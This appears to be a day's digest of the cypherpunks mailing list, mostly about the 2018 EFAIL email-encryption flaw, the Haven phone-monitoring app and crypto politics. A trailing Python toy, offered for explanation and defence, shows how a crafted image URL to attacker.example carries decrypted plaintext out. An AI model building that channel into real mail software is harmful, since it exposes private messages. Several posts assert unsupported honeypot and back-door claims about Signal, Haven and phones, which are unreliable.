Re: EFail - OpenPGP S/MIME Vulnerability

2018-05-15 Thread Steve Kinney


On 05/14/2018 01:48 PM, grarpamp wrote:

> The EFAIL attacks break PGP and S/MIME email encryption by coercing
> clients into sending the full plaintext of the emails to the attacker.

Werner & Co. respond:

https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060334.html

Spoiler:  If your e-mail client software is not borken and
malconfigured, this is Not A Thing.

If it is, you lost the game a long time ago because you don't know anything
about the rules, the board, the pieces or the objective.

:o/




[WAR] The West finally gets one up on Russia re torture

2018-05-15 Thread Zenaan Harkness
The reality of empires is eventually, if belatedly, exposed.
With Israel massacring dozens with impunity, the USA's
"humanitarian" CIA, and now Russia (see below) it's sad days.


** What Moral Standing Do We Have After This Outrage? And Are We
About to Join *Another* Idiotic War, Like Feeble Minions?
https://russia-insider.us9.list-manage.com/track/click?u=fa2faf7034c3c3c413cb3652f=d18de50b27=5110f4b440

by Peter Hitchens (1,513 views) on Tue, May 15, 2018
Typical Russians, eh? They kidnap a man and his pregnant wife in
broad daylight, then hide them in a secret prison in an Asian airport
where they wield sinister influence. There they begin to torture him.
Despite the fact that she is obviously pregnant, they chain her to a
wall and put a hood over her head, for five days. Next, they swathe
her from head to toe in duct tape (in agony, because one of her eyes
is taped open) and fly them both to Syria so he can be tortured more
thoroughly for several years. With the two chained and bound
prisoners comes a delivery note from the Russian spy chief to his
Syrian opposite number: ‘This is the least we could do for you, to
demonstrate our remarkable relationship’.


Re: Haven - Android Physical Space Monitor

2018-05-15 Thread juan
On Tue, 15 May 2018 16:36:22 -0400
Steve Kinney  wrote:

> 
> 
> On 05/15/2018 03:17 PM, juan wrote:
> > On Mon, 14 May 2018 22:16:50 -0400
> > grarpamp  wrote:
> > 
> >> https://guardianproject.github.io/haven/
> >> https://www.youtube.com/watch?v=Fr0wEsISRUw
> >>
> >> Haven is for people who need a way to protect their personal spaces
> >> and possessions without compromising their own privacy. It is an
> >> Android application 
> > 
> > 
> > ah yes. Running a counter-surveillance system on hardware
> > and O.S. owned by the enemy makes so much sense...
> 
> Depends on one's threat model, but yes:  Deploy a sensor network like the
> one described on 'smart' phones and voila, one presents a ready made
> high value surveillance installation to any actor with back door
> access to the devices used.
> 
> The U.S. State Department should fund this project if necessary to
> assure its completion and deployment as a convenient turnkey
> installation, endorsed by "rebel" branded media personalities. 


Yes. And that is exactly what the so-called "guardian project"
does IIRC. Let me recheck:

https://en.wikipedia.org/wiki/The_Guardian_Project_%28software%29

"has received funding from Google, UC Berkeley with the
MacArthur Foundation, Avaaz, Internews, Open Technology Fund"

bingo.

https://en.wikipedia.org/wiki/Open_Technology_Fund

"U.S. Government funded program created in 2012 at Radio Free
Asia"

The rest of the funders are of course total scum, either
pentagon-corporate or left-wing-fascist (that is,
pentagon-corporate).


> It
> fits the only-us model of security fail so beloved of the NSA & Co.,
> resistant to exploitation by State actors not under U.S. control, but
> wide open to Uncle Sam's boys and girls.

Yes. Since signal was mentioned in the advertising blurb,
signal deserves some comment as well.


https://en.wikipedia.org/wiki/Open_Whisper_Systems

OOPS. Lo and behold. Signal got 3 million from the pentagon
again via the so-called 'open technology fund'

'anarchist' moxie is such a principled hero...

the nice thing about signal is that you need a
pentagon-smartphone to use it. Cl!! Oh and moxie works for
fukkkerberg, making facebookkk great again!! that's even
coooler!!



> 
> Relevant:  See "Attacks over the radio processor" in this rather long
> article detailing cell phone vulnerabilities, which seems to indicate
> a hardware level back door in every one of those gadgets.
> 
> https://web.archive.org/web/20150605192550/https://pravokator.si/index.php/2014/06/02/on-mobile-phone-security/
> 
> =or=
> 
> https://tinyurl.com/cell-phn-insecurity



Re: Haven - Android Physical Space Monitor

2018-05-15 Thread Steve Kinney


On 05/15/2018 03:17 PM, juan wrote:
> On Mon, 14 May 2018 22:16:50 -0400
> grarpamp  wrote:
> 
>> https://guardianproject.github.io/haven/
>> https://www.youtube.com/watch?v=Fr0wEsISRUw
>>
>> Haven is for people who need a way to protect their personal spaces
>> and possessions without compromising their own privacy. It is an
>> Android application 
> 
> 
>   ah yes. Running a counter-surveillance system on hardware
>   and O.S. owned by the enemy makes so much sense...

Depends on one's threat model, but yes:  Deploy a sensor network like the
one described on 'smart' phones and voila, one presents a ready made
high value surveillance installation to any actor with back door access
to the devices used.

The U.S. State Department should fund this project if necessary to
assure its completion and deployment as a convenient turnkey
installation, endorsed by "rebel" branded media personalities.  It fits
the only-us model of security fail so beloved of the NSA & Co.,
resistant to exploitation by State actors not under U.S. control, but
wide open to Uncle Sam's boys and girls.

Relevant:  See "Attacks over the radio processor" in this rather long
article detailing cell phone vulnerabilities, which seems to indicate a
hardware level back door in every one of those gadgets.

https://web.archive.org/web/20150605192550/https://pravokator.si/index.php/2014/06/02/on-mobile-phone-security/

=or=

https://tinyurl.com/cell-phn-insecurity



cypherpunks and guns

2018-05-15 Thread juan


out of the memory hole:

--


At 12:51 AM -0800 1/6/98, Wei Dai wrote:

>I don't understand why there is so much talk about guns here lately.
>Unless someone comes up with a weapon that has some very unusual economic
>properties, individuals cannot hope to compete with governments in the
>domain of deadly force. If we have to resort to physical violence, we've
>already lost!

People on almost any unmoderated mailing list will talk about what
interests them. Those who mainly want to talk about crypto are of course
free to do so.

(You have, Wei, done important work in this area. But you very, very seldom
write articles on this list, at least not for the last couple of years--I
count less than one article per month from you over the past half year. I
urge you to write such articles if you dislike reading what others are
writing.)

I agree that two or three or four or five years ago I was much more likely
to write about something more crypto-related. Well, much time has passed.
Most things worth saying have been said, at least for me. I can't work up
the energy to discuss "data havens" a fourth or fifth time.

(And an article from me on data havens, or information markets, or crypto
anarchy, will usually produce complaints from people who don't see what it
has to do with getting the latest version of PGP! That's only a slight
exaggeration.)

There have also been very few major new participants. A few years ago we
could count on one or two major new "talents" joining the list each year,
generating articles and new ideas. For whatever reasons, this has nearly
stopped.

I would guess the reasons are related to a) no major publicity stories as
in past years, b) the disintegration of the list a year ago in the wake of
the "moderation" fiasco (which cut subscriptions by 3-5x), c) competition
from several other crypto lists, "moderated" by their owners, d) exhaustion
of the older participants in the battles, and e) those who are interested
in our topics have mostly already found us (meaning, the rich hunting
period is over).


>Think about it: if we can defend ourselves with guns, why would we need
>crypto?

This has an obvious answer. Guns are a last resort. Crypto makes it less
likely that Big Brother will know what the proles are talking about, less
likely that participants in a plan will be targeted for investigation and
raids.

Wei, your question could be paraphrased this way:

"If Pablo Escobar could defend himself with guns, why did he need crypto in
his cellphone?"

(The answer being that P. Escobar was detected by using a cellphone without
security. The NSA then told the DEA and its allies where he was and they
took him out on a rooftop.)

Final comment: If I find the motivation, I may finish an essay I've been
working on about how we, the Cypherpunks and the World, are *retrogressing*
in crypto areas. Most of the exotic applications are no longer being
discussed, and various mundane commercial products are the main focus. Yawn.

--Tim May



The Feds have shown their hand: they want a ban on domestic cryptography
-:-:-:-:-:-:-:
Timothy C. May  | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."





Re: Haven - Android Physical Space Monitor

2018-05-15 Thread juan
On Mon, 14 May 2018 22:16:50 -0400
grarpamp  wrote:

> https://guardianproject.github.io/haven/
> https://www.youtube.com/watch?v=Fr0wEsISRUw
> 
> Haven is for people who need a way to protect their personal spaces
> and possessions without compromising their own privacy. It is an
> Android application 


ah yes. Running a counter-surveillance system on hardware
and O.S. owned by the enemy makes so much sense...




> We designed Haven for
> investigative journalists, human rights defenders, 

ah yes, only journos matter.


> and people at risk
> of forced disappearance to create a new kind of herd immunity. By
> combining the array of sensors found in any smartphone, with the
> world’s most secure communications technologies, like Signal and Tor,

it is a honeypot. 


> Haven prevents 

does it?


> the worst kind of people from silencing citizens
> without getting caught in the act.



G. Edward Griffin: Voluntaryism, Soviets, Cancer, Banks, Crypto

2018-05-15 Thread grarpamp
Cryptocurrency with WAM at Take The Red Pill Winnipeg
https://www.youtube.com/watch?v=BC3s8rnYLa0
Bitcoin with Max Wright and Trace Mayer
https://www.youtube.com/watch?v=Id6rK87GF8M

America with Lauren Southern
https://www.youtube.com/watch?v=rimtKVZlnKs

Interviews Yuri Bezmenov
https://www.youtube.com/watch?v=y3qkf3bajd4

The Creature From Jekyll Island w/ interview
https://www.youtube.com/watch?v=lu_VqX6J93k
https://www.youtube.com/watch?v=R1gTnOkdXps
In Nielsio's Voluntary Library
https://www.youtube.com/user/Nielsio/videos

A World Without Cancer
https://www.youtube.com/watch?v=JGsSEqsGLWM


Re: EFail - OpenPGP S/MIME Vulnerability

2018-05-15 Thread grarpamp
Various:
>>> Remember the campaign against HTML email ? I do.
>>> We were right.
>>
>> I always disable HTML. And fetching of remote content.
>>
>> And I have since the 90s. I got that from this list :)
>
> Honestly I'm missing PINE and ELM right about now.

trn, ftw.

There's neomutt, which seems popular for text mail these days,
since mutt was also seen to be dormant.


Re: From sand to silicon chips, openly

2018-05-15 Thread grarpamp
On Tue, May 15, 2018 at 12:39 AM, Steven Schear  wrote:
> A good example of why totally open chips are problematic in the commercial
> world.
>
> Spectre/Meltdown Pits Transparency Against Liability: Which is More
> Important to You?
> https://www.bunniestudios.com/blog/?p=5127
>
> As always, the devil is in the details.
>
> " You can’t have it both ways: the whole point of transparency is to enable
> peer review, so you can find and fix bugs more quickly. But if every time a
> bug is found, a manufacturer had to hand $50 to every user of their product
> as a concession for the bug, they would quickly go out of business. This
> partially answers the question why we don’t see open hardware much beyond
> simple breakout boards and embedded controllers: it’s far too risky from a
> liability standpoint to openly share the documentation for complex systems
> under these circumstances. "

As an incomplete snip from the article, it would be bullshit on its own.
At least for systems that start their life as open.

Closed hardware / software generally asserts its fitness, at least in the
corporate sales pitch, so when it fails you can sue the fuck out of them.
For example, Intel is sued in court over Meltdown right now.

Open fabs / hardware / software / dev pushes that entire analysis out to
the user... they can inspect it, pay for analyst verification, read
reviews, etc.

In an open model, it becomes understood that all that is upon you,
and the recourse is no longer suit, but filing bugs and commits
and process change, and then the next release happens.

That paradigm shift is the exact same in open fabs and hardware
as it is in open software, even now in currencies and markets.

You don't see it today because they want power, profit, control,
and to them closed over the ignorant is the way to achieve that.
After all, to date all the sheep have accepted that model of abuse.

Openness and sharing is now proving in demand, profitable,
and hopefully slowly taking over.


Similar conclusions were in the article...
"The Choice: Truthful Mistakes or Fake Perfection?"

The offer is on the table.

Even corporate users of HW know their fitness lawsuits etc will not
always win and recover losses, so they'd also be insane not to offer it.


> " However, even one of their most ardent open-source advocates pushed back
> quite hard when I suggested they should share their pre-boot code. By
> pre-boot code, I’m not talking about the little ROM blob that gets run after
> reset to set up your peripherals so you can pull your bootloader from SD
> card or SSD. That part was a no-brainer to share. I’m talking about the code
> that gets run before the architecturally guaranteed “reset vector”. A number
> of software developers (and alarmingly, some security experts) believe that
> the life of a CPU begins at the reset vector. In fact, there’s often a
> significant body of code that gets executed on a CPU to set things up to
> meet the architectural guarantees of a hard reset – bringing all the
> registers to their reset state, tuning clock generators, gating peripherals,
> and so forth. Critically, chip makers heavily rely upon this pre-boot code
> to also patch all kinds of embarrassing silicon bugs, and to enforce binning
> rules."
>
> If, OTOH, there were ways to manufacture arbitrarily complex chips on the
> desktop for reasonable costs and in reasonable time, and so eliminate the
> commercial issues, this conundrum could vanish.
>
>
>
> On Wed, Mar 21, 2018 at 9:13 AM, Steven Schear 
> wrote:
>>
>> http://parallel.princeton.edu/openpiton/open_source_processors.php

Nice list.
Where's Intel and AMD and Qualcomm and ...


Re: EFail - OpenPGP S/MIME Vulnerability

2018-05-15 Thread Marina Brown

On 05/15/2018 02:14 AM, Mirimir wrote:
> On 05/14/2018 06:05 PM, Marina Brown wrote:
>> On 05/14/2018 07:49 PM, Mirimir wrote:
>>> On 05/14/2018 06:48 AM, grarpamp wrote:
>>>> https://efail.de/
>>>> https://lists.gnupg.org/pipermail/gnupg-users/2018-May/060315.html
>>>> https://efail.de/efail-attack-paper.pdf
>>>> https://twitter.com/matthew_d_green/status/995989254143606789
>>>> https://news.ycombinator.com/item?id=17064129
>>>> https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilities-require-you-take-action-now
>>>> https://arstechnica.com/information-technology/2018/05/critical-pgp-and-smime-bugs-can-reveal-encrypted-e-mails-uninstall-now/
>>>>
>>>> The EFAIL attacks break PGP and S/MIME email encryption by coercing
>>>> clients into sending the full plaintext of the emails to the attacker.
>>>> In a nutshell, EFAIL abuses active content of HTML emails, for example
>>>> externally loaded images or styles, to exfiltrate plaintext through
>>>> requested URLs. To create these exfiltration channels, the attacker
>>>> first needs access to the encrypted emails, for example, by
>>>> eavesdropping on network traffic, compromising email accounts, email
>>>> servers, backup systems or client computers. The emails could even
>>>> have been collected years ago.
>>>
>>> Thanks. That's the clearest explanation I've seen.
>>
>> Remember the campaign against HTML email ? I do.
>> We were right.
>>
>> --- Marina
>
> Right, and its evil child, remote content.
>
> I always disable HTML. And fetching of remote content.
>
> And I have since the 90s. I got that from this list :)
>
> It's funny that these exploits depend on both. And that some on HN put
> it all on pgp/gpg, arguing that one can't expect users to know this
> stuff. By default, Thunderbird does render HTML. But at least it doesn't
> fetch remote content. So Thunderbird+Enigmail users should be safe.

Honestly I'm missing PINE and ELM right about now.

--- Marina
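The exfiltration channel the quoted efail.de summary describes (active HTML content such as an externally loaded image turning the decrypted text into part of a request URL), and the "borken and malconfigured client" condition Steve Kinney's reply earlier in the thread turns on, as an added example that is not part of the thread or of efail.de's material. Everything in it is constructed: there is no real PGP or S/MIME (the "decrypt" step just strips a prefix), the MIME handling is a toy, attacker.example is a placeholder host, and fetch() is a recorder standing in for the client's HTTP stack.

```python
"""
Toy model of the EFAIL direct-exfiltration channel: an attacker who already
holds a ciphertext wraps it in HTML that opens an <img src="..."> attribute
before the encrypted part and closes it after. A client that decrypts,
concatenates all parts into one HTML document and then loads remote content
sends the plaintext to the attacker's server inside the request URL.

Constructed illustration, not code from the thread or from efail.de. No real
crypto: fake_decrypt() strips a prefix. attacker.example is a placeholder.
"""
import re
from urllib.parse import urlsplit, unquote_plus

SECRET = "Meet at the safe house at 9pm"       # constructed plaintext


def fake_decrypt(blob: str) -> str:
    """Stand-in for the PGP/S-MIME step; the client sees only ciphertext
    until it calls this."""
    assert blob.startswith("ENC:")
    return blob[4:]


def attacker_message(ciphertext: str):
    """Attacker-crafted multipart as (content_type, body) tuples. The stolen
    ciphertext is untouched; only the HTML around it is new."""
    return [
        ("text/html", '<img src="http://attacker.example/leak?'),
        ("multipart/encrypted", ciphertext),
        ("text/html", '">'),
    ]


def remote_image_urls(html: str):
    """URLs a renderer that honours <img src> would try to load."""
    return re.findall(r'<img\s+src="([^"]*)"', html, re.S)


def vulnerable_client(parts, fetch):
    """Decrypts, concatenates every part into ONE HTML document, then loads
    remote content. The dangling attribute from part 1 swallows the
    decrypted part 2 and is closed by part 3."""
    html = "".join(fake_decrypt(b) if t == "multipart/encrypted" else b
                   for t, b in parts)
    urls = remote_image_urls(html)
    for u in urls:
        fetch(u)
    return urls


def hardened_client(parts, fetch, load_remote=False):
    """Two of the mitigations the thread mentions: render each MIME part as
    its own document (no attribute can span parts), and do not fetch remote
    content unless the user explicitly turns it on."""
    urls = []
    for t, b in parts:
        doc = fake_decrypt(b) if t == "multipart/encrypted" else b
        urls.extend(remote_image_urls(doc))    # per part, never concatenated
    if load_remote:
        for u in urls:
            fetch(u)
        return urls
    return []


def leaked_plaintext(urls):
    """What the attacker reads back from the web server's request log."""
    return [unquote_plus(urlsplit(u).query) for u in urls]


def run(client, **kw):
    """Feed the crafted message to a client and return what reached the
    attacker's server."""
    fetched = []
    client(attacker_message("ENC:" + SECRET), fetched.append, **kw)
    return leaked_plaintext(fetched)


if __name__ == "__main__":
    print("vulnerable client leaked:", run(vulnerable_client))
    print("hardened client leaked:  ", run(hardened_client))
```

Running it, the vulnerable client hands the full plaintext to attacker.example in the query string, while the hardened client leaks nothing even with load_remote=True, because the opening and closing halves of the attribute never meet once parts are rendered separately. Per-part isolation only defeats this wrapping variant, though: the EFAIL paper also describes attacks that modify the ciphertext itself so that the injected HTML ends up inside the decrypted part, and against those the setting that matters is the one Mirimir and Marina describe, no HTML rendering and no remote content fetching. That is the check worth running on a client before trusting it with encrypted mail.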